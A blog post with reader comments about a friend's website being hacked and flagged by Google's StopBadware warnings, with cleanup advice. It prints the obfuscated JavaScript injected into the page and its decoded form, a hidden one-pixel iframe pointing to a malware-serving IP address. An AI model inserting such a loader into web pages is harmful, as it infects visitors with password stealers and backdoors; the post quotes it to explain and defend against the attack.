Home » Blog » Berkman » Hacked websites, trojan horses, Russian/Panamanian blackhat hackers – just another day at the Berkman Center

Hacked websites, trojan horses, Russian/Panamanian blackhat hackers – just another day at the Berkman Center

About a week ago, I was writing a blog post and wanted to link to a friend’s personal site. I wanted to make sure I got the link right, so I googled her name. I was surprised to discover that Google wouldn’t let me connect directly to her site – instead, under the description of her site as the warning “This site may harm your computer”.

I’d seen the “this site may harm your computer” message before. Several of my colleagues at Berkman are involved with a project and website called Stop Badware. It’s the brainchild of my friend Jonathan Zittrain, who is deeply concerned that the “generativity” of internet-connected PCs might lead to an environment so dangerous that users will switch to less-generative, single purpose Internet devices. (Zittrain’s excellent paper on generativity is here, and I’ve written previously on generativity and Stop Badware here.) Stop Badware maintains a catalog of sites that have been reported to distribute “badware”, which they describe as “…malicious software that tracks your moves online and feeds that information back to shady marketing groups so that they can ambush you with targeted ads. ”

Google identifies sites that they believe are spreading badware and registers them with Stop Badware. My colleagues with Stop Badware have the unenviable task of managing the Google review process – if a site is tagged as spreading badware, the site’s administrator has the option of protesting and having the site reviewed by a team that includes folks at the Berkman Center. This is a very emotional issue for site owners, as having your site de-listed by Google can have very serious consequences for your traffic, your reputation, etc.

So what was my friend’s site doing on Google’s badlist? She doesn’t distribute software of any sort. Clearly some sort of mistake had been made. I wrote a snippy letter to my friends at Berkman, cc’d it to Zittrain and titled the missive, “Not the best day for Stop Badware”.

Of course, I was the one who’d made the mistake. Within half an hour, three of my colleages pointed me to the source code of my friend’s page. At the top of her index page was a strange-looking piece of Javascript:


script language="javascript"> document.write( unescape(
'%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68
%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34
%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D
%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%22%30%22%20%77%69%64%74%68%3D%22%31%22%20
%68%65%69%67%68%74%3D%22%31%22%20%73%63%72
%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61
%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69
%66%72%61%6D%65%3E'
) );

That’s some seriously obfuscated Javascript. But if you translate from hexidecimal to ASCII, the code’s pretty clear – it inserts the following code into the top of the HTML page:


< iframe src= http://81.95.146.98/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter>< /iframe>

The code opens an “iframe”, an inline frame which allows another web page to be embedded within a page – iframes are pretty useful things, especially for building interactive applications in web pages. But this frame is pretty sinister. It opens a one pixel by one pixel frame which attempts to load the webpage located at http://81.95.146.98/index.html.

That page doesn’t load on my browser – the server is apparently refusing connections, at least from my Macintosh – but it occupies an IP in a block of addresses controlled by a charming bunch of guys who do business as RBusiness Network. Google for them and you’ll mostly find lots of angry message board posts from spamfighters – the RBusiness folks operate a number of servers advertised in spam emails and are suspected of relaying large amounts of spam. Many of the RBusiness- associated webpages are in Russian, though their servers are currently in Panama City, Panama – some antispammers believe that RBusiness is short for “Russian Business Network“, which was evidently their previous operating name.

Googling for the specific IP – 81.95.146.98 – turns up a couple of pages with people documenting an interesting exploit – the Microsoft Data Access Components exploit. Basically, when you load this iframe, it runs a small script which downloads and runs a Windows executable file. That file downloads a rootkit, a password sniffer and opens a backdoor into the user’s system. (Needless to say, this only happens on Microsoft Windows systems running unpatched software… which is to say, many Windows systems.) According to Ivan Macalintal, this iframe was installing code from websites that looked fairly innocuous, including one that promised to help you write your company’s travel policy. (Remarkably, this site is the #1 match for a search for “travel policy” on Google, though Google doesn’t let you click directly to the page, stopping you with a “harm your computer” message.)

It’s possible that this is what my friend’s site was trying to install – Ivan’s report dates from October 2006. It’s also possible that it was trying to install a more recent package of malware – Trojan-PSW.Win32.Small.bs – which Avira saw linked to the 81.95.126.98 domain in early January of this year. This little nasty logs passwords entered on webpages, opens a SOCKS proxy on your machine and calls home to an RBusiness server to let the bad guys know how to take advantage of your new machine to send spams and retrieve your passwords.

So has my friend begun working for Russian/Panamanian black hat hackers? It’s pretty unlikely – she’s just not that sort of gal. So, how’d the code get onto her otherwise innocent website?

Simply put, it was hacked. Not content with setting up websites to spread their trojan horses, the RBusiness boys have been breaking into blog and wiki sites and installing this new iframe. In some cases, they’re able to guess default passwords; in other cases, they exploit unpatched bugs in software. I was all ready to go to Berkman yesterday with my tail between my legs and tell my colleagues that my friend’s server had been compromised. But my friends were already dealing with the fact that Google had found malicious iframes on a number of Harvard-affiliated sites, including several blogs hosted on the blogs.law.harvard.edu server! Stop Badware, yesterday at least, was stopping Berkman.

It’s great that Google is proactively searching for these dangerous bits of code, but it would be much, much better if they were also alerting owners of these compromised sites. When the program began, the logic – as I understand it – is that using site registration information (via whois) and alerting the contacts for a site would probably result in sites being thrown off their servers before they had a chance to appeal the decisions. That might have been a good call when most of the folks getting tagged for spreading malware were knowing distributors of the evil stuff. But in a world where lots of folks are having their sites hacked and are spreading malware unconsciously, it would be a really, really good idea to alert people who’ve been tagged by Google. In this case, both the tech and admin contacts for the site were legit, working email addresses and my friend would have been able to remove the offending code much more quickly than by having me discover it via Google.

How widespread is this new attack? That’s not clear – Stop Badware now has over 45,000 reports on URLs which Google or other partners have identified as distributing badware – my friends within the project report that daily reports of new sites have increased 300% over the past few weeks, suggesting there may be a wave of this sort of server compromise.

If your site is identified as spreading malware by Google and you think you’re experiencing this problem, do the following:

– Use the “view source” function on your browser and look at the source of the indexed pages of your site. If you find an obscured javascript like the one posted above, then there’s a good chance you’re in the same circumstances as my friend.

– Edit your html pages to remove the offending code.

– Change your password on your hosting account, making sure you’re using a secure password.

– Alert your hosting provider so they can be sure their software is patched and the attackers weren’t exploiting a known software hole.

– Visit the StopBadware site and use the “request a review” form to have them reexamine your site and remove the block. DON’T DO THIS UNTIL YOU’VE REMOVED ANY OFFENDING CODE, or you’re wasting your time and theirs.

These sorts of attacks are also reminders for Windows users that you can inadvertently install really nasty software on your machine even if you don’t open email attachments. Please, please keep your Windows installation patched and up to date, and consider using the Firefox browser. Some of these attacks take advantage of specific features in the Internet Explorer browser to allow the hostile code to load on your machine.

There’s a brief interview with Jonathan Zittrain in January’s Wired magazine, where the interviewer (Lucas Graves) is skeptical about JZ’s concerns about malware forcing users off PCs and onto less generative devices. Graves notes, “Things would have to get pretty damn bad to make us abandon our PCs.” JZ mentions that they could, indeed, get really bad. Hacked webservers that install code on unsuspecting that turns your PC into a zombie for spam relaying and other attacks? Maybe JZ’s more prescient than I thought…

69 thoughts on “Hacked websites, trojan horses, Russian/Panamanian blackhat hackers – just another day at the Berkman Center”

  1. Of course, like real-world viruses, there is strong incentive for this sort of hacking to spread widely but have shallow impact. I’m beginning to suspect that exploits of the sort that hit your friend, which cause illness (non-crippling waste of cpu/bandwidth) rather than a fatality (data loss, theft of credit card #s), will not be sufficient to cause us to hit Z’s tipping point. We may just be happy to cope with this sort of thing.

  2. “happy” isn’t the word I would have used. I’m currently contending with some linkfarmer who’s stolen the entire content of my blog–as far as I can tell– as filler for the farm. I gather search engines these days can parse for mere word salad, so the asshats need something that looks real. The hosting service listed as responsible for the linkfarmer’s domains is being thoroughly useless.

    I’m the opposite of happy to be dealing with this, but, I must admit, you’re right that I haven’t stopped using my computer.

  3. Pingback: Lex Ferenda » Stopping Badware - or stopping Peacefire?

  4. You’re right that happy wasn’t quite the right word; we aren’t happy to get colds or flus either. But we tolerate, cope, and move on, and I don’t think that it is unreasonable to think that we’ll do the same with computer viruses. Hopefully the shift to reasonably well-defined standards as the primary means of data and application transmission (i.e., the web) will give us a little more diversity in the ecosystem, and make the problem even less critical.

    That said, Z may be right despite himself. For reasons of stability and ease of deployment (not security!) people are moving to dumber end-points, either as web terminals driving a generative-ish set of web apps, or as things like AppleTV/TiVO. So his non-generative end-points may happen, but more out of MS’s incompetence and the complexity of attaching interesting hardware to general purpose PCs than out of a security 9-11/Pearl Harbor.

  5. Pingback: Memex 1.1 » Blog Archive » The new malware ecology

  6. Pingback: TCS Innovations » Blog Archive »

  7. Regarding StopBadWare.Org, while I see that you’re site was indeed hacked and there you did discover the malicious code, this is not always the case. StopBadWare.Org has a noble mission, but they are often incorrect in flagging and delisting sites. They permanently damage the reputation of sites with no malicious or silent programs. Furthermore, StopBadWare.Org will not produce the evidence/scans of the site. Even worse, they do not contact Web Administrators, despite claims to the contrary. StopBadWare.Org needs to rethink their methodology, needs to post “retractions” of incorrect site-flaggings, and needs to provide evidence of the presence of malicious code before delisting. They also need to provide a log of attempts to contact the Web Administrators of these sites. Despit claims to the contrary, they do not contact the site Administrators and many (if not most) of owners of the 30,000+ sites they have delisted are unaware of their status. Vigilantes too believe their mission to be noble. StopBadWare.Org has been bestowed awesome power to delist sites. Without evidence and due process, however, it amounts to nothing more than slander in situations where they are incorrect.

  8. Pingback: Info/Law » Hackers, Badware, and Google

  9. stopbadware.org has not methodology or at least not a good methodology and are just making noise without any good results.
    The bad point is that google is using them and using the name of some universities and the naive people working there to make noise, but very poor organized.
    Im angry on the need to do something, but not in the way that stopbadware.org are acting, thats not ethical at all.
    Why? Because they don’t know nothing about what they are doing.

  10. I received Google’s malware notification email three weeks ago. Then I checked my website carefully and found exactly the same injected code as above. I just removed it without knowing its details (Now I know, thanks for your explanation here.), and then change my website admin FTP passward and request stopbadware.org for review. Now, I run SpyBye, McAfee Site Advisor… desperately every day….

    Although Stopbadware replied me with an autoemail saying that they would get back to me in about 10 bussiness days, I still have not received any reply yet, so I am still waiting hopelessly….

    I got a feeling that Stopbadware & Google currently are putting much higher priority in finding the new sites on which they can put a bad tag than reviewing the sites already in their badlist. This is probably their bussiness strategy. At least, I bought Adword after being tagged by Google, with a wish to provide a workaround to Google’s search engine. So now, people can still link to my website via Google’s Ad link, although the left side links provided by Google’s search engine are still tagged with “This site may harm your computer”.

    But putting bad tag on a website already being clean for long is legally correct or not? This has baddly smash the reputation of my website, with the fact that I am actually a victim of website hackers.

  11. “I got a feeling that Stopbadware & Google currently are putting much higher priority in finding the new sites on which they can put a bad tag than reviewing the sites already in their badlist. This is probably their bussiness strategy.”

    Thats the real point behind all this.

  12. An update on my story, my website has just been removed from Google’s bad list. It is still in StopBadWare.org’s clearinghouse, not synchronised?

  13. We recently discovered (thanks to a customer letting us know) that our site was flagged. We weren’t notified by google or stopbadware and this troubles us a great deal.

    At the moment we can only assume we were labeled after a hacking which occured some nearly three months ago where an iframe was placed on our site.

    We’ve been buying adwords to build up contact with our site and other things and now google has us ‘black listed’ … to say this could potentially hurt our internet sales is an understatement. Google is such a major player on the internet that we worry our reputation will/has suffered a devestating blow.

    The worst part is, it would appear, we are helpless against this labeling. Isn’t it bad enough that stores like ours have to fight major chain competitors like walmart and target without having to fight tooth and claw just to remain in the internet market as well?

  14. Hi folks,

    I work with StopBadware, and I’d like to clear up some confusion and hopefully address the concerns of some of the commenters here. Thanks, Ethan, for blogging this and helping make more people aware of badware.

    To reply to GoogBadnUgly and Son, it’s important to recognize the distinction between what Google does, and what StopBadware does. StopBadware is not the organization flagging sites; that’s Google. More information about Google’s warnings, and StopBadware’s relationship as the organization helping webmasters get their sites unflagged once they are clean, is available here: http://stopbadware.org/home/faq#partnerwarnings

    Google is also the organization making a good faith effort to notify webmasters when their sites have been flagged. As Ethan notes, Google does not at present email to WhoIs contact emails, but they do email webmaster aliases and more. Google has more information about their notifications here: http://googlewebmastercentral.blogspot.com/2007/02/better-badware-notifications-for.html

    If you know of a site that you believe was flagged by Google in error as a “false positive,” please let us know, and we’d be happy to investigate. (Please check the site’s source code for badware that may have been inserted through a hack first – see our Security Tips page, linked below, for info.)

    In reply to David, we don’t have a business strategy, as we are a nonprofit. Our core goal is to help preserve the innovative character of the internet by helping all internet users find ways to be safe online without compromising the net’s characteristic freedom. While I can’t speak for Google, as a search engine, Google has a reasonable interest in not directing searchers to sites that may harm them.

    Regarding the time it can take to process some reviews, StopBadware development staff spent the month of March intensely focused on improving the review process. Since early March, we have been able to provide a quick turnaround for sites that are fully clean of badware before seeking a review. For sites that request review while still infected, the process can be longer, though our turnaround times continue to speed up as we further automate our processes. You can read more about our improvement efforts here: http://groups.google.com/group/stopbadware/browse_thread/thread/3b3765992bbfbe39

    Lastly, to DeAnna, we are definitely sympathetic to the fact that, undeniably, websites that have been hacked have been victimized. Google implements the search warnings to minimize the victimization by helping its searchers avoid being infected themselves. While being flagged with a warning is certainly frustrating, sites are by no means helpless. StopBadware provides a review for any website owner who requests it. We also provide other resources for site owners, including a discussion community.

    The Request for Review form is here: http://stopbadware.org/home/review

    We have a helpful Security Tips page here: http://stopbadware.org/home/security

    Our discussion group is here: http://groups.google.com/group/stopbadware

    Erica George
    StopBadware Online Organizer

  15. How can I have the Harmful warning removed from my website that is clean? This warning has been on my site for over 20 days and I’ve contacted stopbadware.org 3x with no response.

    Thanks
    victoria

  16. Well, one thing that also get’s concerning is when someone moves to a new host, wipes out the forum (on the basis that’s probably the part where exploits might be used) but doesn’t actually get any feedback after requesting a review, so doesn’t know

    a) if someone is even seeing the review requests
    b) if there is still code which is deemed ‘harmful’

    I’ve been looking at pages for a friend’s site http://www.bwpics.co.uk which has been listed – I helped him set up the forum, the only section of HTML/code he didn’t write on his Mac. I don’t know how many days ago he requested a review, but he’s worried as he’s already having a hard time (he’s a photographer, and does photo renovation for people, but with this Google warning, expects many who might see his domain name and avoid it now, and in future, because of the ‘kiss of death’ that has been put out via Google).

    Personally, I don’t touch Google, but in the UK, it appears 75% of site visitors come from that particular search engine, more than in most any other country (I use MetaCrawler.com, and have done for years).

  17. Pingback: badware « gbiondo

  18. Pingback: Sid Hale » Blog Archive » Does Google Report your Site as Malicious?

  19. Hi,

    I’m the webmaster of turksohbet.net

    There isnt any harm result at my site. In 10 days ago i saved my site to a toplist. Then my site has some bug. But when i saw this, i cleaned that toplist from my site. But now my site seems harmful site in google result. Can you help me?

    Regards,

    Nami Karaca

  20. I run a network of websites and one was compromised in this exactly manner recently.

    I have received the notice from Google and StopBadWare.
    Now I am slowly deleting all that malicious code snippets – my website is really big and I am working on this issue for the 2nd week now.

  21. Pingback: …My heart’s in Accra » Over 10,000 malware sites hosted by IPowerWeb

  22. I’m the web admin and programmer at my company. Yesterday we noticed that our main page at http://www.neo-shop.com had been hacked by this (around april 24th). We quickly removed the code and changed all the passwords.
    Today, our Windows 2003 server was ready to install some security patches. I suppose it’s related.

    Does anyone know how they manage to break our security?

  23. All browsers should have a fortress module that keeps up with the latest online scams, like an always on virus scan-type program.

    If the browsers did this users can surf with more ease as their browsing is monitored for problems and alerts them to make a decision.

    If the problems are coming while browsing, then the browsers should have a module that is attached, always on, and alerts of the lastest scam while browsing the net.

    The browser could scan each page before allowing the surfer to view. It shouldn’t be too much of a performance knock these days, especially for legit sites because the pages will quickly scan, they’d have known/legit content types. If hacked, then that is quickly found out and user is warned and can send a note to the owner and some reporting agency(even automatically).

    Basically you take the concept of the always on virus scan and put it in the browser targeting web surfing problems.

    The fortress gets updated as soon as the latest exploit is discovered, similar to always on virus scan services.

  24. halocollection.com home page has the same IFame, and tries to download something from IP that belongs to LUGLINK from Russia

    this is the first line of code there

  25. to Monique:

    That kind of website-checking module may already exist… try the McAfee SiteAdvisor plugin (siteadvisor.com) which can alert you to potentially nasty sites and rates each with red, yellow or green labels to indicate danger and relative safety. Someone briefly mentioned it earlier in the thread, but it deserves a couple of paragraphs.

    Personally recommend FireFox+plugin as the Windows IE version seemed determined to run as a system service on my last try, which seemed a little excessive since I don’t browse the net 100% of the time my computer is on. Besides, you probably ought to be using the Fox anyway.

    Grit your teeth slighly as you click agreement to the licence; your browsing movements are sent to McAfee,
    albeit anonymously and for purposes of good.

    There may be other browser plugins that perform similar functions using other black and whitelists, too.

  26. How can I have the Harmful warning removed from my website that is clean? This warning has been on my site for over 20 days and I’ve contacted stopbadware.org 3x with no response

  27. Hi,

    I’m the webmaster of turksohbet.net

    There isnt any harm result at my site. In 10 days ago i saved my site to a toplist. Then my site has some bug. But when i saw this, i cleaned that toplist from my site. But now my site seems harmful site in google result. Can you help me?

    Regards,

  28. to Monique:

    That kind of website-checking module may already exist… try the McAfee SiteAdvisor plugin (siteadvisor.com) which can alert you to potentially nasty sites and rates each with red, yellow or green labels to indicate danger and relative safety. Someone briefly mentioned it earlier in the thread, but it deserves a couple of paragraphs.

    Personally recommend FireFox+plugin as the Windows IE version seemed determined to run as a system service on my last try, which seemed a little excessive since I don’t browse the net 100% of the time my computer is on. Besides, you probably ought to be using the Fox anyway.

    Grit your teeth slighly as you click agreement to the licence; your browsing movements are sent to McAfee,
    albeit anonymously and for purposes of good.

    There may be other browser plugins that perform similar functions using other black and whitelists, too.

    oyunlar Says: Your comment is awaiting moderation

  29. Hi,

    I’m the webmaster of turksohbet.net

    There isnt any harm result at my site. In 10 days ago i saved my site to a toplist. Then my site has some bug. But when i saw this, i cleaned that toplist from my site. But now my site seems harmful site in google result. Can you help me?

    Regards,

    Nami Karaca

  30. Pingback: Unintentionally distributed badware “may harm your computer” at Elliot Lee

  31. How to protect this trozan virus in freeBSD /linux ? Please let me know how to trace these trozans , I mean any tools .

  32. Pingback: …My heart’s in Accra » Trends in Badware

  33. Well I got one solution for you, system followers, increase the rate for internet access, for instance 10 bucks for an hou of iNet access, that way I can get anyting that I like…

  34. Pingback: The Back Burner » The good, the bad and the ugly

  35. There isnt any harm result at my site. In 10 days ago i saved my site to a toplist. Then my site has some bug. But when i saw this, i cleaned that toplist from my site. But now my site seems harmful site in google result.

  36. I worked hard on my web site for a year, then finally got it up and running at ixwebhosting.com. I got busy with other stuff and didn’t give my web site much attention for a few months, and now I find myself the victim of a trojan virus such as Mr. Zuckerman talks about. I have ran virus scans on my Mac I use for web design and caught nothing. I copied the files to a CD and tested them on my PC. Nothing was found using Norton or Kaspersky. When I uploaded the html code from my home computer to my server, the problem would be okay for a while and get reinfected. What I have repeatedly asked the help desk over there is how my files are getting reinfected since things are clean at home? They have just as repeatedly said the problem is on my end. When I ask directly, they do not tell me how they protect their clients from malware. Meanwhile, I am blacklisted on google for this. I continue to monitor my sites daily. Is there a way for a hacker to sneak some coding in that ties to the link and is not in the original code? Are there antivirus programs that can be uploaded to a server? Is there secure code that a webmaster can use to deflect these nasty trojans? Does anybody know what else I can do to make my site more secure? I have changed the passwords, and will continue to do so frequently. Meanwhile I have to monitor this site to make sure it doesn’t get reinfected, then I have to do all the work to try to rebuild my site’s reputation. I am not a deliberate spreader of malware, and it is very unjust that such hackers exist. If anyone can direct me to solutions that will help me to learn to avoid these problems in the future, I will be much happier.

  37. Hello
    There isnt any harm result at my site. In 10 days ago i saved my site to a toplist. Then my site has some bug. But when i saw this, i cleaned that toplist from my site. But now my site seems harmful site in google result. Can you help me?

  38. Hallo . I have received the notice from Google and StopBadWare.
    Now I am slowly deleting all that malicious code snippets – my website is really big and I am working on this issue for the 2nd week now.

  39. Thanks for the wonderfull article.

    I followed your suggestions and found out the bottom of my index page almost the same Jave Script you mentioned.

    Now I am waiting google to remove the warning.

  40. What about blogs (mine is WordPress) that get the huge long javascript code inserted, but you can’t see the code at all under admin, but in view source only?
    The script displays ads and porn ads…. this also happened on another page that is outside the blog, but connected. Had to rename the page, but the code does not show when you open it in text or dreamweaver…

  41. Lauren, the code is being inserted from your WordPress blog – the hackers have changed your template to insert the javascript. You’ll need to talk to your hosting company and clean up your WordPress instalation. This is a pretty common problem with WordPress – if it’s not kept very up to date, hackers can find ways to break in and insert code into your templates.

Comments are closed.